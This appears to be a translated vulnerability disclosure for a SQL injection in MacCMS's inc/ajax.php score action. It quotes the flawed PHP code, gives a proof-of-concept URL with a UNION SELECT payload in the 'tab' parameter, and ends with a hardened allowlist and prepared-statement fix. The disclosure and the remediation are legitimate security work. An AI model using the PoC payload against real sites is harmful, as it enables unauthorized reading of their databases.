### Brief description:

I saw an earlier bug report from 路人甲 that the vendor said they could not reproduce, so I tried a different spot.

### Detailed description:

For [WooYun: 苹果CMS系统sql注入一枚](http://www.wooyun.org/bugs/wooyun-2014-063677) the vendor said they could not reproduce the issue, so I kept looking in another location.

inc/ajax.php, line 123:

```
elseif($ac=='score') {
    if($id<1){ echo "err"; return;}
    $score = intval(be("get", "score"));
    $res = '{"scoreall":0,"scorenum":0,"score":0.0}';
    if($score<0) { $score = 0;} elseif( $score > 10) { $score = 10; }
    if($tab=='art') { $col='a'; } else { $col='d'; }
    // $tab comes from the request and is concatenated straight into the table name
    $sql="SELECT ".$col."_score,".$col."_scoreall,".$col."_scorenum FROM {pre}".$tab." WHERE ".$col."_id=" .$id;
    $row=$db->getRow($sql);
    if($row){
        $d_score = $row["d_score"];
        $d_scoreall = $row["d_scoreall"];
        $d_scorenum = $row["d_scorenum"];
        if($score>0){
            if(getCookie($tab."score".$id)=="ok"){ echo "haved"; return;}
            $d_scoreall += $score;
            $d_scorenum++;
            $d_score = round( $d_scoreall / $d_scorenum ,1);
            $db->Update ("{pre}vod",array($col."_score",$col."_scoreall",$col."_scorenum"),array($d_score,$d_scoreall,$d_scorenum),$col."_id=".$id);
            sCookie ($tab."score".$id,"ok");
        }
        if($d_score>10) { $d_score=10; }
        $res = '{"scoreall":'.$d_scoreall.',"scorenum":'.$d_scorenum.',"score":'.$d_score.'}';
    }
    unset ($row);
    echo $res;
}
```

As the code shows, $id must be >= 1, $tab is attacker-controlled, and $score does not matter. With $col='d' the table has to be mac_vod, so the only thing standing between the request and an injection is whether 360_safe3.php blocks it.

This kind of injection therefore needs to be eliminated in the application's own code rather than relying on a third-party protection script.

A direct injection is blocked, as expected:

![maccms2.png](https://images.seebug.org/upload/201406/261322574658a26db496f2eb98b482fb4769353a.png)

poc:

```
http://localhost/maccms/inc/ajax.php?ac=score&id=1&tab=vod union select/**/1,user(),3 from dual%23
```

![maccms.png](https://images.seebug.org/upload/201406/2613231642b519dfa4236e08f927fd4275ba134d.png)

### Proof of vulnerability:

Since the vendor said they have no time to change the code, it seems best not to keep digging~~

![maccms.png](https://images.seebug.org/upload/201406/2613231642b519dfa4236e08f927fd4275ba134d.png)
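As an added example (not maccms code), this is what the fix at the code layer looks like: $tab is checked against a fixed allowlist that also decides the column prefix, and $id is bound as an integer parameter instead of being concatenated. The `mac_` prefix constant, the `fetchScore` name and the PDO connection are assumptions for the example.

```php
<?php
// Added example, not the project's code: hardened version of the score lookup.
// The original interpolates $tab (table name) and $id (WHERE clause) as strings.

// Table prefix standing in for the {pre} placeholder (assumed, based on mac_vod).
const TABLE_PREFIX = 'mac_';

// Only these two values of $tab are meaningful, and each maps to a fixed
// column prefix; any other value is rejected before a query is even built.
const TAB_TO_COL = ['vod' => 'd', 'art' => 'a'];

function fetchScore(PDO $db, string $tab, $id): ?array
{
    if (!array_key_exists($tab, TAB_TO_COL)) {
        return null;            // unknown table name: refuse, never interpolate
    }
    $id = (int) $id;            // force an integer, mirroring the existing $id<1 check
    if ($id < 1) {
        return null;
    }
    $col = TAB_TO_COL[$tab];

    // Identifiers come only from the constants above; the single user-supplied
    // value ($id) is a bound parameter, so a payload such as
    // "vod union select ..." can no longer change the shape of the statement.
    $sql = sprintf(
        'SELECT %1$s_score, %1$s_scoreall, %1$s_scorenum FROM %2$s%3$s WHERE %1$s_id = :id',
        $col, TABLE_PREFIX, $tab
    );
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage sketch; connection details are placeholders, and emulated prepares are
// disabled so the parameter is bound server-side rather than escaped client-side.
// $db = new PDO('mysql:host=localhost;dbname=maccms', 'user', 'pass',
//               [PDO::ATTR_EMULATE_PREPARES => false]);
// var_dump(fetchScore($db, $_GET['tab'] ?? '', $_GET['id'] ?? 0));
```

With this shape, the request in the PoC fails the allowlist check and never reaches the database, regardless of whether 360_safe3.php is installed.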